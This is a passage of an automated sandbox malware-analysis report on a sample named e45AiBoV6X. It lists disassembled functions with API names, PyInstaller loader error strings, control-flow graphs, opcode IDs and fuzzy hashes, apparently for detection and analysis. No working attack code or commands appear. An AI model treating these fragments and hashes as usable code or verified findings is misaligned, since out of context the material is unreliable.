                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _fread_nolock$Message
                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                              • API String ID: 677216364-3497178890
                                                              • Opcode ID: 5b42461e0461bb9a3f2c2c1cb70c0dd9a465cc773c1336ae125719f36c9a405f
                                                              • Instruction ID: 8cd3dbe39fdeabba35f3012ba4dbe3923b299f09861fa7d16d38a881ef22a6a4
                                                              • Opcode Fuzzy Hash: 5b42461e0461bb9a3f2c2c1cb70c0dd9a465cc773c1336ae125719f36c9a405f
                                                              • Instruction Fuzzy Hash: D4718F21E1868785FB20DB24E5542FD23A1EB8CB88F445035E9ADC7BE9FE6CF5548B40
                                                              Function 00007FF6FB1E1440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                              • API String ID: 2030045667-3659356012
                                                              • Opcode ID: edb324d4c3b8625c1d3aace64eba9c8b43f634d022d1992519341acc65c721e8
                                                              • Instruction ID: 84ecfcd80d7305998b3be636ada93a78a111f2fbd3bdddcd1f2a45b457d3d257
                                                              • Opcode Fuzzy Hash: edb324d4c3b8625c1d3aace64eba9c8b43f634d022d1992519341acc65c721e8
                                                              • Instruction Fuzzy Hash: 69414722E0864382FB20DB15A9505BE63A0AF4DBD8F545432DA6E87AF5FE7CF5518700
                                                              Function 00007FF6FB1E11F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                              • API String ID: 2030045667-2813020118
                                                              • Opcode ID: 85026a7eca33eed62396a3c44ac8e2af46aea1793c30bb10ceca8764f980f820
                                                              • Instruction ID: f25522d03216c9f26ca48102f9033c5c81c35bf2f67cc895f3b0f9c312f4e899
                                                              • Opcode Fuzzy Hash: 85026a7eca33eed62396a3c44ac8e2af46aea1793c30bb10ceca8764f980f820
                                                              • Instruction Fuzzy Hash: BB519B62E0868381FB60EA16A8503BE6291BB89798F544135ED6EC7BE5FF3CF551C700
                                                              Function 00007FF6FB1FAD6C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 985 7ff6fb1fad6c-7ff6fb1fad92 986 7ff6fb1fad94-7ff6fb1fada8 call 7ff6fb1f43d4 call 7ff6fb1f43f4 985->986 987 7ff6fb1fadad-7ff6fb1fadb1 985->987 1005 7ff6fb1fb19e 986->1005 989 7ff6fb1fb187-7ff6fb1fb193 call 7ff6fb1f43d4 call 7ff6fb1f43f4 987->989 990 7ff6fb1fadb7-7ff6fb1fadbe 987->990 1006 7ff6fb1fb199 call 7ff6fb1f9bf0 989->1006 990->989 993 7ff6fb1fadc4-7ff6fb1fadf2 990->993 993->989 996 7ff6fb1fadf8-7ff6fb1fadff 993->996 998 7ff6fb1fae01-7ff6fb1fae13 call 7ff6fb1f43d4 call 7ff6fb1f43f4 996->998 999 7ff6fb1fae18-7ff6fb1fae1b 996->999 998->1006 1003 7ff6fb1fb183-7ff6fb1fb185 999->1003 1004 7ff6fb1fae21-7ff6fb1fae27 999->1004 1009 7ff6fb1fb1a1-7ff6fb1fb1b8 1003->1009 1004->1003 1008 7ff6fb1fae2d-7ff6fb1fae30 1004->1008 1005->1009 1006->1005 1008->998 1012 7ff6fb1fae32-7ff6fb1fae57 1008->1012 1014 7ff6fb1fae8a-7ff6fb1fae91 1012->1014 1015 7ff6fb1fae59-7ff6fb1fae5b 1012->1015 1016 7ff6fb1fae93-7ff6fb1faebb call 7ff6fb1fc90c call 7ff6fb1f9c58 * 2 1014->1016 1017 7ff6fb1fae66-7ff6fb1fae7d call 7ff6fb1f43d4 call 7ff6fb1f43f4 call 7ff6fb1f9bf0 1014->1017 1018 7ff6fb1fae82-7ff6fb1fae88 1015->1018 1019 7ff6fb1fae5d-7ff6fb1fae64 1015->1019 1048 7ff6fb1faebd-7ff6fb1faed3 call 7ff6fb1f43f4 call 7ff6fb1f43d4 1016->1048 1049 7ff6fb1faed8-7ff6fb1faf03 call 7ff6fb1fb594 1016->1049 1046 7ff6fb1fb010 1017->1046 1020 7ff6fb1faf08-7ff6fb1faf1f 1018->1020 1019->1017 1019->1018 1023 7ff6fb1faf21-7ff6fb1faf29 1020->1023 1024 7ff6fb1faf9a-7ff6fb1fafa4 call 7ff6fb202c2c 1020->1024 1023->1024 1027 7ff6fb1faf2b-7ff6fb1faf2d 1023->1027 1035 7ff6fb1fb02e 1024->1035 1036 7ff6fb1fafaa-7ff6fb1fafbf 1024->1036 1027->1024 1031 7ff6fb1faf2f-7ff6fb1faf45 1027->1031 1031->1024 1038 7ff6fb1faf47-7ff6fb1faf53 1031->1038 1044 7ff6fb1fb033-7ff6fb1fb053 ReadFile 1035->1044 1036->1035 1040 7ff6fb1fafc1-7ff6fb1fafd3 GetConsoleMode 1036->1040 1038->1024 1042 7ff6fb1faf55-7ff6fb1faf57 1038->1042 1040->1035 1045 7ff6fb1fafd5-7ff6fb1fafdd 1040->1045 1042->1024 1047 7ff6fb1faf59-7ff6fb1faf71 1042->1047 1050 7ff6fb1fb14d-7ff6fb1fb156 GetLastError 1044->1050 1051 7ff6fb1fb059-7ff6fb1fb061 1044->1051 1045->1044 1053 7ff6fb1fafdf-7ff6fb1fb001 ReadConsoleW 1045->1053 1056 7ff6fb1fb013-7ff6fb1fb01d call 7ff6fb1f9c58 1046->1056 1047->1024 1057 7ff6fb1faf73-7ff6fb1faf7f 1047->1057 1048->1046 1049->1020 1054 7ff6fb1fb173-7ff6fb1fb176 1050->1054 1055 7ff6fb1fb158-7ff6fb1fb16e call 7ff6fb1f43f4 call 7ff6fb1f43d4 1050->1055 1051->1050 1059 7ff6fb1fb067 1051->1059 1062 7ff6fb1fb003 GetLastError 1053->1062 1063 7ff6fb1fb022-7ff6fb1fb02c 1053->1063 1068 7ff6fb1fb17c-7ff6fb1fb17e 1054->1068 1069 7ff6fb1fb009-7ff6fb1fb00b call 7ff6fb1f4368 1054->1069 1055->1046 1056->1009 1057->1024 1066 7ff6fb1faf81-7ff6fb1faf83 1057->1066 1060 7ff6fb1fb06e-7ff6fb1fb083 1059->1060 1060->1056 1070 7ff6fb1fb085-7ff6fb1fb090 1060->1070 1062->1069 1063->1060 1066->1024 1074 7ff6fb1faf85-7ff6fb1faf95 1066->1074 1068->1056 1069->1046 1076 7ff6fb1fb092-7ff6fb1fb0ab call 7ff6fb1fa984 1070->1076 1077 7ff6fb1fb0b7-7ff6fb1fb0bf 1070->1077 1074->1024 1085 7ff6fb1fb0b0-7ff6fb1fb0b2 1076->1085 1081 7ff6fb1fb0c1-7ff6fb1fb0d3 1077->1081 1082 7ff6fb1fb13b-7ff6fb1fb148 call 7ff6fb1fa7c4 1077->1082 1086 7ff6fb1fb0d5 1081->1086 1087 7ff6fb1fb12e-7ff6fb1fb136 1081->1087 1082->1085 1085->1056 1089 7ff6fb1fb0da-7ff6fb1fb0e1 1086->1089 1087->1056 1090 7ff6fb1fb0e3-7ff6fb1fb0e7 1089->1090 1091 7ff6fb1fb11d-7ff6fb1fb128 1089->1091 1092 7ff6fb1fb103 1090->1092 1093 7ff6fb1fb0e9-7ff6fb1fb0f0 1090->1093 1091->1087 1095 7ff6fb1fb109-7ff6fb1fb119 1092->1095 1093->1092 1094 7ff6fb1fb0f2-7ff6fb1fb0f6 1093->1094 1094->1092 1096 7ff6fb1fb0f8-7ff6fb1fb101 1094->1096 1095->1089 1097 7ff6fb1fb11b 1095->1097 1096->1095 1097->1087
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 64dc175ebe5f387d8147aa219be35c50c73af6a678ecd55484cdaf28201a08d1
                                                              • Instruction ID: f5e055fceffc53f5b794d61c64e7a08555c6d169ef99cdab7ceb5876c17f195e
                                                              • Opcode Fuzzy Hash: 64dc175ebe5f387d8147aa219be35c50c73af6a678ecd55484cdaf28201a08d1
                                                              • Instruction Fuzzy Hash: 85C1F226E1C68791EB61DB15A4403BE37A1FB98B88F550131DA6E877F1EE7CE855C300
                                                              Function 00007FF6FB1E33E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,00007FF6FB1E3534), ref: 00007FF6FB1E3411
                                                                • Part of subcall function 00007FF6FB1E29E0: GetLastError.KERNEL32(?,?,?,00007FF6FB1E342E,?,00007FF6FB1E3534), ref: 00007FF6FB1E2A14
                                                                • Part of subcall function 00007FF6FB1E29E0: FormatMessageW.KERNEL32(?,?,?,00007FF6FB1E342E), ref: 00007FF6FB1E2A7D
                                                                • Part of subcall function 00007FF6FB1E29E0: MessageBoxW.USER32 ref: 00007FF6FB1E2ACF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message$ErrorFileFormatLastModuleName
                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                              • API String ID: 517058245-2863816727
                                                              • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                              • Instruction ID: 1d8c0df6fd8a5ef8bde1ecc7c3af3fead7223a4fc5fc9a714621c32a0e5ca254
                                                              • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                              • Instruction Fuzzy Hash: 89213D61F1864391FB26EB24E9513BE5290AF4C398F801236E67DC69F5FE2CE5048710
                                                              Function 00007FF6FB1F4938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 1279662727-0
                                                              • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                              • Instruction ID: 476057493f5560489294b66ecdfc4e74d91cd70a192fcd2b2411a668e4bec7d9
                                                              • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                              • Instruction Fuzzy Hash: 29417122E1878343E754DB6195503796261FB9C7A8F109335E6AD83AE5FF6CA5F0C700
                                                              Function 00007FF6FB1EBF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 3251591375-0
                                                              • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                              • Instruction ID: 1944ed0c782d6a72df424f5b4e2c204f17b496fee78f094ca1a0ba810387238b
                                                              • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                              • Instruction Fuzzy Hash: 2A311A25E0824381FB64EB6899653BD1281AF4978CF440034EA7ECBEF3FE2CB9448611
                                                              Function 00007FF6FB1EF45C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                              • Instruction ID: 1adbaf364a4a0024140f1d7681e4dac30bb370f42e2754074938bbb80f9a2542
                                                              • Opcode Fuzzy Hash: 304c800bfc18b22a295e41f2f803514c44f0a5a87c6028a89610e4dcef950876
                                                              • Instruction Fuzzy Hash: 7B518062E0968346FB28DE26940067E6791AF8CBACF184634DD7D86BF5EF3CE441C610
                                                              Function 00007FFDFB381253 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1991624093.00007FFDFB381000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFB380000, based on PE: true
                                                              • Associated: 00000001.00000002.1991585735.00007FFDFB380000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB3F3000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB418000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB423000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB42D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1992057570.00007FFDFB430000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1992103361.00007FFDFB432000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb380000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: ..\s\ssl\record\rec_layer_s3.c
                                                              • API String ID: 1452528299-2209325370
                                                              • Opcode ID: 40ce96e19bb8b63da36a7f13a6cc3432322cfce75248eb9035a6226d8607318d
                                                              • Instruction ID: 6757c853e074a5703d7ab6686a80ec8e6cfb4a8861e0e33277fb57103123c987
                                                              • Opcode Fuzzy Hash: 40ce96e19bb8b63da36a7f13a6cc3432322cfce75248eb9035a6226d8607318d
                                                              • Instruction Fuzzy Hash: 8E41AD33B0AE4283EB20AF59D454A6973E1FB44B88F148139DA6C07BE8DF79E4598741
                                                              Function 00007FF6FB1F9E68 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindCloseChangeNotification.KERNEL32(?,?,?,00007FF6FB1F9CE5,?,?,00000000,00007FF6FB1F9D9A), ref: 00007FF6FB1F9ED6
                                                              • GetLastError.KERNEL32(?,?,?,00007FF6FB1F9CE5,?,?,00000000,00007FF6FB1F9D9A), ref: 00007FF6FB1F9EE0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseErrorFindLastNotification
                                                              • String ID:
                                                              • API String ID: 1687624791-0
                                                              • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                              • Instruction ID: a6cc17002dc50e9e85a16ba20153214398180aab3176f7972fe484a0553a904e
                                                              • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                              • Instruction Fuzzy Hash: 78215E21F1868341FB94E761A59437D26929F8CBE8F085235DA3EC76FAEE6CE445C300
                                                              Function 00007FF6FB1FB444 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                              • Instruction ID: 6fbc9857c4937a9933242a782e48884cf24c36f4a7c08b1976389c8317e457e7
                                                              • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                              • Instruction Fuzzy Hash: 1E11C465E18A8281DB20CB25A54417A6361AB48BF8F680331EE7E87BF9EE3CD050C700
                                                              Function 00007FF6FB1FB1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                              • Instruction ID: 03150745851d9494dfba7d3a81df21f2f884b34cb97f6064eefa8bbd481ea127
                                                              • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                              • Instruction Fuzzy Hash: 4C419E36D0820387EB34DA15E55127E73A0EB59B88F140231DAAEC76E1EF2CF502CB51
                                                              Function 00007FF6FB1E76A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _fread_nolock
                                                              • String ID:
                                                              • API String ID: 840049012-0
                                                              • Opcode ID: dcfd361712def83af12ecbe626be18c098a710ffdfeea99e1549849338d7a625
                                                              • Instruction ID: 2c77d70b92bd71451f16a1fa1d91d6df9601d3ce8bf72cc8eeb6b4d1f6a0d6f3
                                                              • Opcode Fuzzy Hash: dcfd361712def83af12ecbe626be18c098a710ffdfeea99e1549849338d7a625
                                                              • Instruction Fuzzy Hash: CD216F21F0865345FB10EA56A9083BAA641BF4DBD8F884430EE2D96BD6EE7DF046C600
                                                              Function 00007FF6FB1FAC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
